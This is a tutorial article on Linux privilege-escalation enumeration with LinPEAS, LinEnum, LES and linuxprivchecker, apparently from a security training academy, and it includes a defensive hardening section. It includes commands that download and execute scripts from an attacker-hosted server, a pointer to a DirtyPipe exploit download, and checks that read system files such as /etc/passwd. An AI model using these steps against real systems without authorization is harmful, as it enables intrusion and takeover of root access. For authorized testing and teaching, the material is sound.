Linux Privilege Escalation: LinPEAS, LinEnum & LES Enumeration
In the post-exploitation phase, after gaining an initial foothold on a Linux system, you rarely land with root privileges already in hand. Linux Privilege Escalation — climbing from a low-privileged user to root — is the heart of every internal penetration test. Before reaching the exploit, you need thorough enumeration: what is running, what you can write, which SUID binaries exist, and which cron jobs execute. This article covers the four most important tools for that phase: LinPEAS, LinEnum, LES (Linux Exploit Suggester), and linuxprivchecker.
Legal & ethical scope: The tools and techniques described here are intended exclusively for authorized penetration testing, CTF and lab environments (HackTheBox, TryHackMe, VulnHub, DVWA, Metasploitable), and your own home labs. Running them against systems without written authorization may violate the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), the Budapest Convention on Cybercrime, and equivalent national statutes.
What Linux Privilege Escalation is
The term Privilege Escalation (PrivEsc) refers to exploiting a vulnerability, design flaw, or misconfiguration to gain privileges higher than those assigned to you. On Linux it splits into two categories:
- Vertical PrivEsc: from an unprivileged user → root (or from a service account → root).
- Horizontal PrivEsc: from one user to another at the same level — for example, reading another user’s home directory.
In MITRE ATT&CK this maps to the tactic TA0004 — Privilege Escalation. Before any exploit, step zero is enumeration — and that is where the tools below make all the difference.
Why automated enumeration scripts are essential
- Speed: a PrivEsc check that takes 30+ minutes manually runs in under 2 minutes.
- Better coverage: hundreds of checks (SUID, capabilities, writable paths, kernel exploits, cron jobs, sudoers) without missing anything.
- Repeatability: the same results on the same target — essential for the report.
- Tradecraft: most scripts are portable Bash or Python — they run inside minimalist environments with no compiler or external dependencies.
1. LinPEAS — Linux Privilege Escalation Awesome Script
LinPEAS (part of the PEASS-ng project by Carlos Polop) is today the de facto standard for Linux PrivEsc enumeration. It is a monolithic Bash script that runs hundreds of checks and returns colorized output (red = high probability of PrivEsc, yellow = worth investigating).
Install and run (lab)
# On the attacker box (Kali), download:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# Serve to the lab victim via a simple HTTP server:
python3 -m http.server 8000 # on the attacker
# On the target lab VM:
curl http://10.10.10.50:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_report.txt
Useful flags
| Flag | Purpose |
|---|---|
| -a | All checks (more aggressive, slower) |
| -s | Stealth mode — less noise |
| -q | Quiet mode (no banner) |
| -o sysinfo,procs | Run only specific check categories |
| -P pass | Password to use for sudo brute attempts |
What LinPEAS looks for
- Kernel version and known exploits
- Sudo rules and mapping to GTFOBins
- SUID/SGID binaries and capabilities
- Writable paths inside $PATH
- Cron jobs and systemd timers
- Credentials inside configuration files, history files, and the environment
- Docker socket and container escape vectors
- NFS exports with no_root_squash
2. LinEnum — clean system enumeration
LinEnum (rebootuser) is a classic Bash script — smaller than LinPEAS, without colorized output, but extremely fast and reliable. It produces a structured report that is ideal as a pentest report appendix.
# On the lab VM:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
# Basic scan:
./LinEnum.sh
# Thorough scan + keyword search + save to file:
./LinEnum.sh -t -k password -r linenum_report.txt
| Flag | Purpose |
|---|---|
| -t | Thorough (additional checks) |
| -k <keyword> | Keyword search inside files |
| -r <file> | Save the report |
| -e <path> | Export directory for exportable files |
| -h | Help menu |
When to choose LinEnum over LinPEAS: in restricted shells (no color codes), on very small VM memory budgets, or when you want clean output for fast grep.
3. Linux Exploit Suggester (LES)
LES (The-Z-Labs) focuses on a different question: “given this kernel, which known CVEs apply to it?” It reads the output of uname -r and matches it against a database of kernel exploits.
# On the lab VM:
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# Example output:
# [+] [CVE-2022-0847] DirtyPipe
# Details: https://dirtypipe.cm4all.com/
# Tags: ubuntu=20.04|22.04
# Download URL: https://haxx.in/files/dirtypipez.c
Important: kernel exploits are frequently unstable and can crash the target. On any production-like engagement, test on a VM clone first, and consider whether a kernel exploit is actually needed or whether there is a more stable path through misconfigurations (sudo, SUID, cron).
4. linuxprivchecker
linuxprivchecker is a Python implementation of similar logic to LinEnum. Advantage: it runs on systems that ship Python but lack a full Bash environment with all expected utilities. A good fallback when LinPEAS is blocked by EDR or restricted shells.
wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.py
python3 linuxprivchecker.py extended | tee privchecker.log
# Targeted check categories:
python3 linuxprivchecker.py system
python3 linuxprivchecker.py suid_sgid
python3 linuxprivchecker.py cron_jobs
python3 linuxprivchecker.py world_writable
Manual checks — the baseline every pentester should know
The scripts are excellent, but every pentester should be able to perform the following by hand:
# Sudo rules for the current user:
sudo -l
# SUID binaries:
find / -perm -4000 -type f 2>/dev/null
# SGID binaries:
find / -perm -2000 -type f 2>/dev/null
# World-writable directories:
find / -writable -type d 2>/dev/null
# Capabilities:
getcap -r / 2>/dev/null
# Cron jobs:
cat /etc/crontab
ls -la /etc/cron.* 2>/dev/null
# Kernel & OS:
uname -a
cat /etc/os-release
# Listening ports (potential lateral movement):
ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null
# Accounts with UID 0 (anything other than root is suspicious):
awk -F: '$3==0 {print $1}' /etc/passwd
For every SUID binary or sudo entry you find, consult GTFOBins — the largest database of legitimate binaries that can be abused for PrivEsc.
Common mistakes
- Running scripts from /tmp with noexec: Many hardened systems mount /tmp as noexec. Use bash linpeas.sh or pick a writable + executable path such as /dev/shm.
- No verification of findings: Never trust the output blindly. Manually verify every candidate path before reporting it.
- Ignoring the blue team: These scripts leave a huge footprint in auditd and EDR logs. On red team engagements, weigh the benefit against the detection risk.
- Stale versions: Always download the latest release — new CVEs and techniques are added monthly.
Defensive / Blue team perspective
- auditd rules: Monitor execution of unusual binaries (Bash scripts run from /tmp, /dev/shm).
- OSSEC / Wazuh: Alert on repeated execution of find / -perm, getcap, sudo -l by unprivileged users.
- Hardening:
  - Mount /tmp and /var/tmp with noexec,nosuid,nodev.
  - Minimize SUID binaries — strip the ones you do not need.
  - Avoid NOPASSWD sudoers entries for binaries that appear in GTFOBins.
  - Patch management — running a kernel that is six months out of date is a real exposure.
- YARA rules: Filesystem detection of LinPEAS and LinEnum signatures.
Best practices for pentesters
- Always work inside a documented scope with written authorization.
- Save the full output of every scan — essential for the report.
- Combine at least two tools (for example, LinPEAS + LES) for cross-validation.
- In the report, explain why the finding is a risk and how to fix it — not just “SUID found”.
- Respect the nature of target systems — avoid kernel exploits in production when a more stable path exists.
Summary
LinPEAS, LinEnum, LES, and linuxprivchecker cover different angles of the same problem: automated Linux PrivEsc enumeration. They do not replace a deep understanding of Linux internals — they complement it. On every internal pentest or CTF lab, the combined use of these tools alongside manual checks is the fastest route to a complete PrivEsc findings report.
Next steps
- Linux Privilege Escalation Tools — Part 2
- All Information Gathering articles
- External references: MITRE ATT&CK TA0004, GTFOBins, PEASS-ng on GitHub.
For deeper training in offensive security, see the courses at Audax Cybersecurity Academy.